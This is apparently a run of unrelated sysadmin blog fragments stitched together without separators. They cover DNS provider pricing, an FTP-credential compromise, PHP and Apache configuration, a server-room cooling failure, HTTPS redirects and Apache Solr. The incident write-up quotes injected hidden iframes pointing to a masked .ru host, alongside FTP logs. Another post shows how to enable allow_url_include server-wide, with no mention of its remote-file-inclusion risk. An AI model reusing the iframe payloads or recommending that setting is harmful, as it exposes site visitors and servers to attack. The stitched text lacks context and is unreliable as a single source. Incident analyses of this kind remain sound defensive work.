Since the mail server for these accounts are pointing to other servers, I deleted all the email accounts, forwarders, mailinglists, etc. After this I’ve seen sending error/failure messages from mail logs of the said accounts It shows ‘fixed_login authenticator failed for hostxx’ [535 Incorrect authentication data].

We’ll try this on our server and hopefully offer this to our shared hosting clients who wants SSL but not interested in paying extra for a dedicated ip address.

DynDNS
- comprehensive services offerings
- no downtimes since inception (2001)
- worldwide DNS cluster
- multiplatform dynamic update clients with excellent documentation
- 29.95 per zone per year
- web interface
- SLA offerings options
- Bind based architecture

easyDNS
- unknown reliability
- worldwide DNS cluster
- multiplatform dynamic update clients
- priced at $19.99 per zone per year
- web interface
- no SLA offering
- Bind based architecture

Nettica
- unknown reliability
- mostly US based DNS cluster (1 location in UK)
- priced at $10 per zone per year
- 100$ SLA offering
- no linux update client, however dynamic ip updates can be done with curl call to their website
- web interface
- windows only API’s

Zoneedit
- Pioneer of hosted DNS
- Bad recent reliability
- Bind based architecture
- mostly US based DNS cluster (1 location in Germany)
- multiplatform dynamic update clients
- wide range of dynamic update clients (java, python, perl, direct calls to their website with wget), clients hosted on sourceforge with limited documentation
- host 5 domains for free, limited to 200meg query limit per domain(approx 1 million queries), additional options cost “zone credits @ $10.95 each” for services like additional domains, load balancing, monitoring, additional queries.

UltraDNS
- Very comprehensive list of offerings
- 15 worldwide nodes on 5 continents
- Protection against DNS based DDOS
- cross platform XML based API
- web portal
- 100% uptime SLA
- directory based architecture, using Oracle database replication technology. Not based on BIND
- $15 per month for 1 domain with 5 records and 5000 queries, overage costs are $1 per 1000 queries and 0.50 cents for per additional record.

iframe src="http://***.ru:8080/index.php" width=111 height=162 style="visibi
iframe src="http://***.ru:8080/index.php" width=136 height=162 style="visibility: hidden" /iframe
iframe src="http://***.ru:8080/index.php" width=141 height=156 style="visibility: hidden" /iframe

Some of the index.php files had multiple IFRAME statements appended to the end. Knowing the username of affected account and affected filename I searched in /var/log/messages for any related entries and hit jackpot:

Aug 27 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] user is now logged in
Aug 27 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [NOTICE] /home/user//public_html/index.php downloaded (2311 bytes, 1001.70KB/sec)
Aug 27 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [INFO] Logout.
Aug 27 01:28:04 web152 pure-ftpd: (?@78.92.144.185) [INFO] user is now logged in
Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [NOTICE] /home/user//public_html/index.php uploaded (2353 bytes, 10.42KB/sec)
Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.

What’s interesting to note here is that even though downloading/uploading of index.php happens within a 6 second window, the source ip address for download and upload are not the same. During the next few days the same file is downloaded and uploaded but never from the same set of ip addresses. During the few days that I was allowing this to happen as I was monitoring said activity and collecting the IP addresses to see if a pattern emerges:

83.82.57.39 GeoIP Country Edition: NL, Netherlands
95.52.163.74 GeoIP Country Edition: RU, Russian Federation
189.122.164.40 GeoIP Country Edition: BR, Brazil
69.159.47.21 GeoIP Country Edition: CA, Canada
85.221.184.164 GeoIP Country Edition: PL, Poland
98.243.198.220 GeoIP Country Edition: US, United States
78.30.154.22 GeoIP Country Edition: RS, Serbia
77.81.33.229 GeoIP Country Edition: RO, Romania
83.6.73.91 GeoIP Country Edition: PL, Poland
190.198.3.27 GeoIP Country Edition: VE, Venezuela
75.208.130.92 GeoIP Country Edition: US, United States
68.84.202.157 GeoIP Country Edition: US, United States
75.80.81.104 GeoIP Country Edition: US, United States

Seeing that no clear pattern is evident here and considering that the IP address was different for each connection it is my rationale that the computer’s at these IP addresses were a part of a botnet. My assumption is that a developer had saved the account password and was infected by malicious software which was able to gather the ftp credentials.

Cleanup included restoring files and changing all account/ftp/email and database passwords.

First create an include file:
/usr/local/apache/conf/userdata/std/2/username/domain.com/custom.conf

Add directive to custom.conf:

php_admin_flag allow_url_include On


Then run to enable include:
/scripts/ensure_vhost_includes --user=username --verbose

Alternatively, enabling allow_url_include globally (server-wide) is done by editing /usr/local/lib/php.ini and adding “allow_url_include = On” directive to the Fopen wrapper section.
;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;

;Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
allow_url_include = On

and restarting apache by issuing “service httpd restart” command as root.

location / {
root /var/www/nginx-default;
index index.html;
if (!-e $request_filename) {
rewrite . /index.html last;
}
}


This time I let the developer slide and implemented a fix on system end by appending umask 022 into /usr/local/apache/bin/envvars file and restarting apache. This will apply a umask of 022 to the default permission of 666 for newly created files. The result is that anytime apache creates a file be it via php or another way it will always have 644 permissions and will be world readable.
But wait the fun doesn’t end there as we are running cPanel on this particular server and this env change will be lost next time Apache is rebuilt via EasyApache. To make this change persistent create a file called umask with the digits 022 as contents in /var/cpanel/easy/apache/rawenv/

While promises of having the A/C unit up and running soon were being thrown at me I wasn’t biting. Shutting down 3 non-essential servers did help things a bit.  The database servers with their 15K rpm disks were running their internal fans at nearly 100% coping with the heat. At this point I was starting to feel a little bit upbeat picturing what would happen if the servers were not servers and just consumer grade PC’s turned into servers. If you are reading this you must know what burned power supplies smell like! At some point I knew the A/C unit would be fixed and I would be able to re-power up the non-essential servers. Monitoring temperatures inside the cabinet would be nice, but we don’t have such a useful device. Next best thing was internal temperature sensors inside a direct attach storage array which has 6 sensors: 4 in the front and 2 in back. Cacti proved invaluable as I could monitor what was going on and most importantly see if the datacenter made good on their promise. Each raise in temperature indicates a period when the A/C was not working or working poorly.

temp_graph

1.) Using Htaccess/mod_rewrite. You only need to create a .htaccess file on your home directory and add the codes below:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [R,L]
</IfModule>


The above codes may not work on other Apache/php setup but i’m not sure what’s the exact configuration variable for that.

Anyway, here are my alternatives. Either of them is fine if you’re running http and https on standard ports (http=80, https=443), otherwise change the value to your custom http or https port. Change domain.com to your domain.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{SERVER_PORT} ^80$
RewriteRule ^(.*)$ https://domain.tld/$1 [R,L]
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{SERVER_PORT} !^443$
RewriteRule ^(.*)$ https://domain.tld/$1 [L,R]
</IfModule>


2.) PHP function. If your site use PHP you can redirect the url to SSL/https using this function:
<?php
function ForceHTTPS(){
if( $_SERVER['HTTPS'] != "on") {
//if( $_SERVER['SERVER_PORT'] == 80 ) { <<-- use this line if the above will not work.
$new_url = "https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
header("Location: $new_url");
exit; }
}
?>

If you are using an application/script wherein you can enter the settings for site url (either from database or config file), it is better to use that settings.

Let me know if you run into issues, maybe i can help.

Apache Solr is an open source project:

Solr is an open source enterprise search server based on the Lucene Java search library, with XML/HTTP and JSON APIs, hit highlighting, faceted search, caching, replication, a web administration interface and many more features. It runs in a Java servlet container such as Tomcat.

Apache Solr has a lot of promise improving the search results which, considering the down sides of drupal search, would greatly improve the user experience.

Acquia has the Apache Solr search service in beta right now and it will be offered as a hosted offering.

We saw a preview of the www.drupal.org site redesign and it definitely looks like they will be using the Apache Solr.   The demo of the search results page looked very promising, with features such as search suggest, filter and more features to come.